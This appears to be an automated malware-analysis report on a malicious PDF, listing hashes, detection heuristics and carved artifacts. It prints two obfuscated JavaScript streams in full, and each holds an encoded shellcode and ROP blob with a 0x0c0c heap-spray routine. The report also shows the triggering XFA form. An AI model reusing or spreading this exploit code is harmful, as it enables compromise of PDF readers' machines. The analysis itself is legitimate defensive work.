Malicious PDF — malware analysis report

Static analysis result for SHA-256 a5a009edfed7c4d5…

MALICIOUS

PDF

53.9 KB First seen: 2026-05-10
MD5: 335698f9211138d013cc6f2dc33d41a9 SHA-1: 060e5b21c92c95f18ddd15910e1362dfae054d6d SHA-256: a5a009edfed7c4d5e5e8e337425ab9cf3836bc3bdd6c8097f6cc9d8f1596ef7c
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 4131 bytes
SHA-256: 6e031d90b0b2e0ba23e3455c65583fc9978384d9c9f19802ba5e25df670ec42b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
7 of 11 identifiers look randomly generated (e.g. 'KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm = unescape;
var fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ucedb%uf2bf%u7c14%u29bc%ud9c9%u2474%u5af4%u49b1%u7a31%u8319%ufcea%u7a03%u1015%u80e1%u5d54%u790a%u3da5%u9c82%u6f94%ud5f0%ubf85%ubb72%u3425%u28d6%u38bd%u5fff%uf676%u6ed9%u3787%u3de6%u564b%u3f9a%ub898%u8fa3%ub9ed%uf2e4%ueb1e%u79bd%u1b8c%u3cc9%u1a0d%u4b1d%u642d%u8c18%udeda%udd23%u5573%uc56b%u31f8%uf44c%u222d%ubfb0%u905a%u3e42%ue98b%u70ab%ua5f3%ubc95%ub4fe%u7bd2%uc3e1%u7828%ud39c%u02ea%u567a%ua5ef%uc009%u54cb%u96dd%u5b98%uddaa%u7fc7%u322d%u7b7c%ub5a6%u0d53%u91fc%u5577%ub8a6%u332e%uc509%u9b31%u63f6%u0e39%u15e2%u4760%u2bc7%u979b%u3c4f%ua5e8%u96d0%u8666%u3099%ue970%u84b3%u14ee%uf43c%ud327%ua468%uf25f%u2f10%ufba0%uffc4%u53f0%ubfb7%u13a0%u5767%u9bab%u4758%u71d4%uedf1%u122e%uf0f4%ud031%uf060%u0531%u7d2d%u4fd7%u2bdd%uf84f%u7644%u991b%uad89%u9961%u4102%u5495%u2ce3%u0185%u7b03%u84f7%u561c%u2892%u5c89%u7e35%u5e25%u4860%ua1ea%uc247%u3723%ubd28%ud74b%u3da8%ubd1a%u55a8%ue5fa%u40fa%u3005%ud96f%uba90%u8dc6%ud233%ue8e4%u7d74%udf16%u4284%u26c1%ub203%u4b67%u41cf' );
var KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.length + 20 + 8 < 65536) KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT+=KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ = KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.substring(0, (0x0c0c-0x24)/2);
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj = fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ.substring(0, 65536/2);
while(AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.length < 0x80000) AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj += AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj;
oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv = AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.substring(0, 0x80000 - (0x1020-0x08) / 2);
var udpOZDbyuVqBlzQD = new Array();
for (EVHMc=0;EVHMc<0x1f0;EVHMc++) udpOZDbyuVqBlzQD[EVHMc]=oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 5017 bytes
SHA-256: 08cfa4ccd4a9d6b478a13d7521a4776f36ec07e323b195957678ffc8f2621f10
Preview script
First 1,000 lines of the extracted script
var sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm = unescape;
var fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ucedb%uf2bf%u7c14%u29bc%ud9c9%u2474%u5af4%u49b1%u7a31%u8319%ufcea%u7a03%u1015%u80e1%u5d54%u790a%u3da5%u9c82%u6f94%ud5f0%ubf85%ubb72%u3425%u28d6%u38bd%u5fff%uf676%u6ed9%u3787%u3de6%u564b%u3f9a%ub898%u8fa3%ub9ed%uf2e4%ueb1e%u79bd%u1b8c%u3cc9%u1a0d%u4b1d%u642d%u8c18%udeda%udd23%u5573%uc56b%u31f8%uf44c%u222d%ubfb0%u905a%u3e42%ue98b%u70ab%ua5f3%ubc95%ub4fe%u7bd2%uc3e1%u7828%ud39c%u02ea%u567a%ua5ef%uc009%u54cb%u96dd%u5b98%uddaa%u7fc7%u322d%u7b7c%ub5a6%u0d53%u91fc%u5577%ub8a6%u332e%uc509%u9b31%u63f6%u0e39%u15e2%u4760%u2bc7%u979b%u3c4f%ua5e8%u96d0%u8666%u3099%ue970%u84b3%u14ee%uf43c%ud327%ua468%uf25f%u2f10%ufba0%uffc4%u53f0%ubfb7%u13a0%u5767%u9bab%u4758%u71d4%uedf1%u122e%uf0f4%ud031%uf060%u0531%u7d2d%u4fd7%u2bdd%uf84f%u7644%u991b%uad89%u9961%u4102%u5495%u2ce3%u0185%u7b03%u84f7%u561c%u2892%u5c89%u7e35%u5e25%u4860%ua1ea%uc247%u3723%ubd28%ud74b%u3da8%ubd1a%u55a8%ue5fa%u40fa%u3005%ud96f%uba90%u8dc6%ud233%ue8e4%u7d74%udf16%u4284%u26c1%ub203%u4b67%u41cf' );
var KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT = sujulyxKNfuHzefgRiYqjssqLTbSXwSHkBoqGlUmGosgwdyIVXTGKxxXKfIvZsdSzevm( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.length + 20 + 8 < 65536) KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT+=KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ = KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT.substring(0, (0x0c0c-0x24)/2);
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += fqbkvNqANRxxNhpOAicqLjbrRPhXisSalBiIHXqdWKffNiJrpXEdExkzVRZCrCpQDRxOWDouxQLJSZGtPFxkiO;
fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ += KKiwCuGaZzPCNSVHTMskwWEjASeSGBdesKexyGFNIGJadwWqemBtyGoBnhafBYzZgMwjmBebsHszZkIPAfMLAsGjVBSbJT;
AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj = fbVUkWehbsYjZwOzlegNchCBDFuTKBvQObuezsGSJfiYigQGnkDmNURuxHXutmMtCmvofGJ.substring(0, 65536/2);
while(AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.length < 0x80000) AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj += AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj;
oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv = AMUcnMDmhdaXoZaiEVhXiZnEOLXfxGpXKZFaNPKSKJPHEVSDfrvEmaFgyRhFmcxSQCgqmOVooKjmSncQxvswMqdj.substring(0, 0x80000 - (0x1020-0x08) / 2);
var udpOZDbyuVqBlzQD = new Array();
for (EVHMc=0;EVHMc<0x1f0;EVHMc++) udpOZDbyuVqBlzQD[EVHMc]=oshaapSNvWOBFHQzxjquVObuJaxAEjpJFRubnwNjCkiouCiTiaeiaUQjBRv+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054297 00000 n
0000054330 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54816
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: da52c77f649d798f3577c709d0087aefd51a65b6a7c0fe9716661eccd392e249
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.